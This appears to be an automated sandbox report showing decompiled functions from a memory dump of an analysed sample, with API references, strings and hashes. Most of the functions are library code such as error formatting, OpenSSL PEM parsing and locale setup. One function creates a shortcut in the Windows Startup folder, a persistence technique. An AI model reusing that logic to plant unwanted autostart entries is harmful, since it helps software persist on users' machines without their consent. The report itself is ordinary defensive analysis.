Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95
stringmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411900(WCHAR* __ecx, long __edx, WCHAR* _a4) {
				short _v8;
				WCHAR* _v12;
				short _v2060;
				int _t15;
				long _t36;
				void* _t44;
				WCHAR* _t48;

				_t36 = __edx;
				_v12 = __ecx;
				if(__edx == 0) {
					_t36 = GetLastError();
				}
				FormatMessageW(0x1300, 0, _t36, 0x400,  &_v8, 0, 0);
				_t15 = lstrlenW(_v8);
				_t44 = LocalAlloc(0x40, 0x50 + (_t15 + lstrlenW(_v12)) * 2);
				lstrcpyW(_t44, _v12);
				lstrcatW(_t44, L" failed with error ");
				E00412AC0(_t36,  &_v2060);
				lstrcatW(_t44,  &_v2060);
				lstrcatW(_t44, L": ");
				lstrcatW(_t44, _v8);
				_t48 = _a4;
				if(_t48 == 0) {
					MessageBoxW(0, _t44, 0, 0);
				} else {
					if(lstrlenW(_t44) < 0x400) {
						lstrcpynW(_t48, _t44, 0x400);
						E00412BA0(_t48);
					} else {
						E0042B420(_t48, 0, 0x800);
						E0042D8D0(_t48, _t44, 0x7fe);
						E00412BA0(_t48);
					}
				}
				LocalFree(_v8);
				return LocalFree(_t44);
			}

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32 ref: 00411962
lstrcatW.KERNEL32 ref: 00411974
lstrcatW.KERNEL32 ref: 0041198B
lstrcatW.KERNEL32 ref: 00411993
lstrcatW.KERNEL32 ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Uniqueness

Uniqueness Score: -1.00%

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E004635B0(void* __ebx, intOrPtr* __edx, void* __ebp, char _a4, char _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, char _a32, char _a36, char _a132, char _a137, char _a141, char _a143, char _a386, signed int _a388, intOrPtr _a396, intOrPtr* _a400, intOrPtr* _a404, intOrPtr* _a408, intOrPtr* _a412) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* __edi;
				void* __esi;
				signed int _t125;
				void* _t141;
				void* _t146;
				void* _t151;
				void* _t157;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t173;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t183;
				char _t186;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t206;
				intOrPtr _t210;
				intOrPtr _t218;
				void* _t219;
				intOrPtr _t222;
				intOrPtr _t224;
				char _t236;
				void* _t237;
				void* _t240;
				void* _t241;
				intOrPtr _t244;
				intOrPtr _t251;
				void* _t252;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t258;
				intOrPtr* _t261;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t264;
				intOrPtr* _t265;
				void* _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				signed int _t271;
				signed int _t272;
				void* _t274;
				void* _t275;
				void* _t279;
				void* _t280;
				void* _t284;

				_t247 = __edx;
				E0042F7C0(0x188);
				_t125 =  *0x50ad20; // 0xa4c21a8c
				_a388 = _t125 ^ _t271;
				_push(__ebx);
				_a16 = _a400;
				_push(__ebp);
				_a28 = _a404;
				_t251 = _a396;
				_a20 = _a408;
				_a12 = _t251;
				_a24 = _a412;
				_a4 = 0;
				_t236 = E0045AF30(__ebx, __edx, _t251);
				_a8 = _t236;
				_t257 = E0045AF30(_t236, __edx, _t251);
				_v0 = _t257;
				_t269 = E0045AF30(_t236, __edx, _t251);
				if(_t236 == 0 || _t257 == 0 || _t269 == 0) {
					E0045AD10(_t236);
					E0045AD10(_t257);
					E0045AD10(_t269);
					E004512D0(_t236, _t247, _t251, _t269, __eflags, 9, 0x6d, 0x41, ".\\crypto\\pem\\pem_lib.c", 0x2b4);
					_t272 = _t271 + 0x20;
					goto L72;
				} else {
					_a386 = 0;
					_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
					_t274 = _t271 + 0xc;
					_t284 = _t141;
					if(_t284 <= 0) {
						L14:
						_push(0x2bf);
						_push(".\\crypto\\pem\\pem_lib.c");
						_push(0x6c);
						goto L15;
					} else {
						do {
							if(_t284 >= 0) {
								while( *((char*)(_t274 + _t141 + 0x94)) <= 0x20) {
									_t141 = _t141 - 1;
									if(_t141 >= 0) {
										continue;
									}
									goto L8;
								}
							}
							L8:
							 *((char*)(_t274 + _t141 + 0x95)) = 0xa;
							_t146 = _t141 + 2;
							if(_t146 >= 0x100) {
								L74:
								E0042AC83();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t251);
								_t253 = E0044F960(_t236, _t247, E004656B0());
								__eflags = _t253;
								if(__eflags != 0) {
									_push(_t257);
									E0044F3E0(_t253, _t269, _t253, 0x6a, 0, _v12);
									_push(_a4);
									_push(_v0);
									_push(_v4);
									_push(_v8);
									_push(_t253);
									_t151 = E00463C30(_t247, _t269);
									E0044F5E0(_t253);
									return _t151;
								} else {
									E004512D0(_t236, _t247, _t253, _t269, __eflags, 9, 0x71, 7, ".\\crypto\\pem\\pem_lib.c", 0x248);
									__eflags = 0;
									return 0;
								}
							} else {
								 *((char*)(_t274 + _t146 + 0x98)) = 0;
								_t157 = E00448190( &_a132, "-----BEGIN ", 0xb);
								_t279 = _t274 + 0xc;
								if(_t157 != 0) {
									goto L13;
								} else {
									_t261 =  &_a143;
									_t240 = _t261 + 1;
									do {
										_t159 =  *_t261;
										_t261 = _t261 + 1;
									} while (_t159 != 0);
									_t257 = _t261 - _t240;
									_t162 = E00448190( &_a137 + _t257, "-----\n", 6);
									_t279 = _t279 + 0xc;
									if(_t162 == 0) {
										_t164 = E0045AD50(_t236, _t247, _t269, _t236, _t257 + 9);
										_t274 = _t279 + 8;
										__eflags = _t164;
										if(__eflags != 0) {
											E0042D8D0( *((intOrPtr*)(_t236 + 4)),  &_a143, _t257 - 6);
											_t168 =  *((intOrPtr*)(_t236 + 4));
											_t236 = 0;
											 *((char*)(_t168 + _t257 - 6)) = 0;
											_t262 = _v0;
											_t169 = E0045AD50(0, _t247, _t269, _t262, 0x100);
											_t274 = _t274 + 0x14;
											__eflags = _t169;
											if(__eflags != 0) {
												 *((char*)( *((intOrPtr*)(_t262 + 4)))) = 0;
												_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
												_t274 = _t274 + 0xc;
												__eflags = _t263;
												if(__eflags <= 0) {
													L32:
													_t264 = 0;
													__eflags = 0;
													goto L33;
												} else {
													do {
														if(__eflags >= 0) {
															while(1) {
																__eflags =  *((char*)(_t274 + _t263 + 0x94)) - 0x20;
																if( *((char*)(_t274 + _t263 + 0x94)) > 0x20) {
																	goto L27;
																}
																_t263 = _t263 - 1;
																__eflags = _t263;
																if(_t263 >= 0) {
																	continue;
																}
																goto L27;
															}
														}
														L27:
														 *((char*)(_t274 + _t263 + 0x95)) = 0xa;
														_t257 = _t263 + 2;
														__eflags = _t257 - 0x100;
														if(_t257 >= 0x100) {
															goto L74;
														} else {
															 *((char*)(_t274 + _t257 + 0x94)) = 0;
															__eflags = _a132 - 0xa;
															if(_a132 == 0xa) {
																goto L32;
															} else {
																_t251 = _t257 + _t236;
																_t222 = E0045AD50(_t236, _t247, _t269, _v0, _t251 + 9);
																_t274 = _t274 + 8;
																__eflags = _t222;
																if(__eflags == 0) {
																	_push(0x2e4);
																	goto L22;
																} else {
																	_t224 = E00448190( &_a132, "-----END ", 9);
																	_t274 = _t274 + 0xc;
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_t251 = _a12;
																		_t264 = 1;
																		L33:
																		_a4 = 0;
																		_t173 = E0045AD50(_t236, _t247, _t269, _t269, 0x400);
																		_t274 = _t274 + 8;
																		__eflags = _t173;
																		if(__eflags != 0) {
																			 *_a4 = 0;
																			__eflags = _t264;
																			if(_t264 != 0) {
																				_t251 = _t269;
																				_v0 = _t251;
																				_t269 = _v0;
																				_a4 = _t236;
																				goto L51;
																			} else {
																				_t267 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
																				_t274 = _t274 + 0xc;
																				__eflags = _t267;
																				if(_t267 <= 0) {
																					L50:
																					_t251 = _v0;
																					L51:
																					_t236 = _a8;
																					_t265 =  *((intOrPtr*)(_t236 + 4));
																					_t83 = _t265 + 1; // 0x9
																					_t241 = _t83;
																					do {
																						_t176 =  *_t265;
																						_t265 = _t265 + 1;
																						__eflags = _t176;
																					} while (_t176 != 0);
																					_t266 = _t265 - _t241;
																					_t178 = E00448190( &_a132, "-----END ", 9);
																					_t274 = _t274 + 0xc;
																					__eflags = _t178;
																					if(__eflags != 0) {
																						L70:
																						_push(0x322);
																						_push(".\\crypto\\pem\\pem_lib.c");
																						_push(0x66);
																						goto L15;
																					} else {
																						_t180 = E00448190( *((intOrPtr*)(_t236 + 4)),  &_a141, _t266);
																						_t274 = _t274 + 0xc;
																						__eflags = _t180;
																						if(__eflags != 0) {
																							goto L70;
																						} else {
																							_t183 = E00448190( &_a141 + _t266, "-----\n", 6);
																							_t274 = _t274 + 0xc;
																							__eflags = _t183;
																							if(__eflags != 0) {
																								goto L70;
																							} else {
																								E0047E5B0( &_a36);
																								_push(_a4);
																								_t186 = _a4;
																								_push(_t186);
																								_push( &_a4);
																								_push(_t186);
																								_push( &_a36);
																								_t188 = E0047E5D0();
																								_t274 = _t274 + 0x18;
																								__eflags = _t188;
																								if(__eflags >= 0) {
																									_t193 = E0047E560( &_a36, _a4 + _a4,  &_a32);
																									_t275 = _t274 + 0xc;
																									__eflags = _t193;
																									if(__eflags >= 0) {
																										_t244 = _a4 + _a32;
																										__eflags = _t244;
																										_a4 = _t244;
																										if(_t244 == 0) {
																											goto L17;
																										} else {
																											 *_a16 =  *((intOrPtr*)(_t236 + 4));
																											 *_a28 =  *((intOrPtr*)(_t251 + 4));
																											_t247 = _a20;
																											 *_a20 = _a4;
																											 *_a24 = _t244;
																											E00454C70(_t236);
																											E00454C70(_t251);
																											E00454C70(_t269);
																											_t272 = _t275 + 0xc;
																										}
																									} else {
																										_push(0x332);
																										_push(".\\crypto\\pem\\pem_lib.c");
																										_push(0x64);
																										goto L15;
																									}
																								} else {
																									_push(0x32c);
																									_push(".\\crypto\\pem\\pem_lib.c");
																									_push(0x64);
																									goto L15;
																								}
																							}
																						}
																					}
																					goto L73;
																				} else {
																					_t236 = 0;
																					__eflags = _t267;
																					do {
																						if(__eflags >= 0) {
																							while(1) {
																								__eflags =  *((char*)(_t274 + _t267 + 0x94)) - 0x20;
																								if( *((char*)(_t274 + _t267 + 0x94)) > 0x20) {
																									goto L44;
																								}
																								_t267 = _t267 - 1;
																								__eflags = _t267;
																								if(_t267 >= 0) {
																									continue;
																								}
																								goto L44;
																							}
																						}
																						L44:
																						 *((char*)(_t274 + _t267 + 0x95)) = 0xa;
																						_t257 = _t267 + 2;
																						__eflags = _t257 - 0x100;
																						if(_t257 >= 0x100) {
																							goto L74;
																						} else {
																							__eflags = _t257 - 0x41;
																							 *((char*)(_t274 + _t257 + 0x94)) = 0;
																							_t236 =  !=  ? 1 : _t236;
																							_t206 = E00448190( &_a132, "-----END ", 9);
																							_t274 = _t274 + 0xc;
																							__eflags = _t206;
																							if(_t206 == 0) {
																								goto L50;
																							} else {
																								__eflags = _t257 - 0x41;
																								if(_t257 > 0x41) {
																									goto L50;
																								} else {
																									_t210 = E0045AE30(_t236, _t247, _t269, _t269, _a4 + 9 + _t257);
																									_t274 = _t274 + 8;
																									__eflags = _t210;
																									if(__eflags == 0) {
																										_push(0x303);
																										goto L22;
																									} else {
																										E0042D8D0(_a4 + _a4,  &_a132, _t257);
																										_t280 = _t274 + 0xc;
																										_push(0xfe);
																										 *((char*)(_a4 + _t257 + _a4)) = 0;
																										_a4 = _a4 + _t257;
																										_push( &_a132);
																										_push(_t251);
																										__eflags = _t236;
																										if(_t236 != 0) {
																											_a132 = 0;
																											_t218 = E0044F780(_t251, _t269);
																											_t274 = _t280 + 0xc;
																											__eflags = _t218;
																											if(_t218 <= 0) {
																												goto L50;
																											} else {
																												while(1) {
																													__eflags =  *((char*)(_t274 + _t218 + 0x94)) - 0x20;
																													if( *((char*)(_t274 + _t218 + 0x94)) > 0x20) {
																														break;
																													}
																													_t218 = _t218 - 1;
																													__eflags = _t218;
																													if(_t218 >= 0) {
																														continue;
																													}
																													break;
																												}
																												 *((char*)(_t274 + _t218 + 0x95)) = 0xa;
																												_t219 = _t218 + 2;
																												__eflags = _t219 - 0x100;
																												if(_t219 >= 0x100) {
																													goto L74;
																												} else {
																													 *((char*)(_t274 + _t219 + 0x94)) = 0;
																													goto L50;
																												}
																											}
																										} else {
																											goto L49;
																										}
																									}
																								}
																							}
																						}
																						goto L77;
																						L49:
																						_t267 = E0044F780(_t251, _t269);
																						_t274 = _t280 + 0xc;
																						__eflags = _t267;
																					} while (__eflags > 0);
																					goto L50;
																				}
																			}
																		} else {
																			_push(0x2f1);
																			goto L22;
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
														goto L77;
														L31:
														E0042D8D0( *((intOrPtr*)(_v0 + 4)) + _t236,  &_a132, _t257);
														 *((char*)( *((intOrPtr*)(_v0 + 4)) + _t257 + _t236)) = 0;
														_t236 = _t251;
														_t251 = _a12;
														_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
														_t274 = _t274 + 0x18;
														__eflags = _t263;
													} while (__eflags > 0);
													goto L32;
												}
											} else {
												_push(0x2d8);
												L22:
												_push(".\\crypto\\pem\\pem_lib.c");
												_push(0x41);
												_push(0x6d);
												_push(9);
												E004512D0(_t236, _t247, _t251, _t269, __eflags);
												_t236 = _a8;
												goto L16;
											}
										} else {
											_push(0x2ce);
											_push(".\\crypto\\pem\\pem_lib.c");
											_push(0x41);
											L15:
											_push(0x6d);
											_push(9);
											E004512D0(_t236, _t247, _t251, _t269, _t291);
											L16:
											_t275 = _t274 + 0x14;
											L17:
											E0045AD10(_t236);
											E0045AD10(_v0);
											E0045AD10(_t269);
											_t272 = _t275 + 0xc;
											L72:
											L73:
											_pop(_t252);
											_pop(_t258);
											_pop(_t237);
											return E0042A77E(_t237, _a388 ^ _t272, _t247, _t252, _t258);
										}
									} else {
										goto L13;
									}
								}
							}
							goto L77;
							L13:
							_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
							_t274 = _t279 + 0xc;
							_t291 = _t141;
						} while (_t141 > 0);
						goto L14;
					}
				}
				L77:
			}

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

-----END , xrefs: 0046382F, 00463940, 004639E4
.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----, xrefs: 004636D4, 00463A21
, xrefs: 00463A90
-----BEGIN , xrefs: 004636A4

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Uniqueness

Uniqueness Score: -1.00%

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00425A97(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00428C96(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E00428C96(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00428C96(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E004255AC( *_t42, 0x50aae8);
								_t15 = E00425E97(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00420BED();
									E0042453C( *_t42);
									E004243E2( *_t42);
									E00420BED(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00424BDD(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00420BED( *_t42);
							E00420BED(_t42);
							L8:
							goto L3;
						}
						E00420BED(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00425208(_t48))) = 0xc;
					goto L4;
				}
			}

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 17d3c2619d013419f6fb4dbcd9dc3d5229f96e394bca3e5d2eaf771417ff5058
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 17d3c2619d013419f6fb4dbcd9dc3d5229f96e394bca3e5d2eaf771417ff5058
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00425B6E Relevance: 18.1, APIs: 12, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00425B6E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E004295C3(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004242FD(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x507ab0);
					E00428520(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E00425007();
						_v36 = _t88;
						E004245DC(0, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E00428C96(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00428AF7(0xc);
							_v8 = 1;
							E004255AC(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E00425CE3();
							_t66 = E00425E97(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0042453C(_t83);
								_t43 = E004243E2(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00437413(_a8, 0x50a97c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x510434 = 1;
									}
								}
								E00428AF7(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0042465C(_t25, _t83);
								E0042453C(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x50aba8 & 0x00000001;
									if(( *0x50aba8 & 0x00000001) == 0) {
										E0042465C(0x50aae4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x50aae4; // 0x50aae8
										_t32 = _t77 + 0x84; // 0x50b030
										 *0x50b028 =  *_t32;
										_t33 = _t77 + 0x90; // 0x4d0da8
										 *0x50b084 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x50a978 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00425CF2();
							}
						}
						_v8 = 0xfffffffe;
						E00425D25(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
						E004242D2();
						_t45 = 0;
					}
					return E00428565(_t45);
				}
				L20:
			}

APIs

__invoke_watson.LIBCMT ref: 00425BA7
__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
String ID:
API String ID: 2762079118-0
Opcode ID: 86168fff8a2eaa4a3829cfd610c13faf090a62fb5c293827f2bfd80631fc3520
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 86168fff8a2eaa4a3829cfd610c13faf090a62fb5c293827f2bfd80631fc3520
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
stringcomCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00411B90(void* __ecx, WCHAR* __edx, void* _a4) {
				void* _v8;
				void* _v12;
				struct _ITEMIDLIST* _v16;
				char _v20;
				short _v532;
				char* _t30;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t43;
				intOrPtr* _t48;
				intOrPtr* _t49;
				void* _t50;
				WCHAR* _t51;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t67;
				void* _t70;

				_t51 = __edx;
				_v8 = 0;
				_v12 = 0;
				__imp__CoInitialize(0, _t67, _t70, _t50);
				_t30 =  &_v8;
				__imp__CoCreateInstance(0x4ce908, 0, 1, 0x4cd568, _t30);
				__imp__CoUninitialize();
				if(_t30 >= 0) {
					_t34 = _v8;
					_t30 =  *((intOrPtr*)( *_t34))(_t34, 0x4cf2e8,  &_v12);
					if(_t30 >= 0) {
						_t35 = _v8;
						_t30 =  *((intOrPtr*)( *_t35 + 0x50))(_t35, __ecx);
						if(_t30 >= 0) {
							SHGetSpecialFolderLocation(_a4, 7,  &_v16);
							__imp__SHGetPathFromIDListW(_v16,  &_v532);
							lstrcatW( &_v532, "\\");
							lstrcatW( &_v532, _t51);
							_t43 = _v12;
							_t30 =  *((intOrPtr*)( *_t43 + 0x18))(_t43,  &_v532, 1);
							if(_t30 >= 0) {
								GetSystemDirectoryW( &_v532, 0x100);
								lstrcatW( &_v532, L"\\shell32.dll");
								_t48 = _v8;
								_t30 =  *((intOrPtr*)( *_t48 + 0x44))(_t48,  &_v532, 1);
								if(_t30 >= 0) {
									_t49 = _v8;
									_t30 =  *((intOrPtr*)( *_t49 + 0x40))(_t49,  &_v532, 0x100,  &_v20);
								}
							}
						}
					}
				}
				_t54 = _v12;
				if(_t54 != 0) {
					_t30 =  *((intOrPtr*)( *_t54 + 8))(_t54);
				}
				_t55 = _v8;
				if(_t55 == 0) {
					return _t30;
				} else {
					return  *((intOrPtr*)( *_t55 + 8))(_t55);
				}
			}

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
